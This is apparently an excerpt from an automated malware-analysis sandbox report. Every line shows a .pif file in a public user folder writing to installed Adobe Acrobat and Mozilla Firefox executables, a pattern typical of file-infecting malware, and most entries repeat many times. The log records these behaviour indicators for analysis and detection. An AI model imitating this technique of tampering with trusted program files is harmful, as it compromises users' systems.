Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
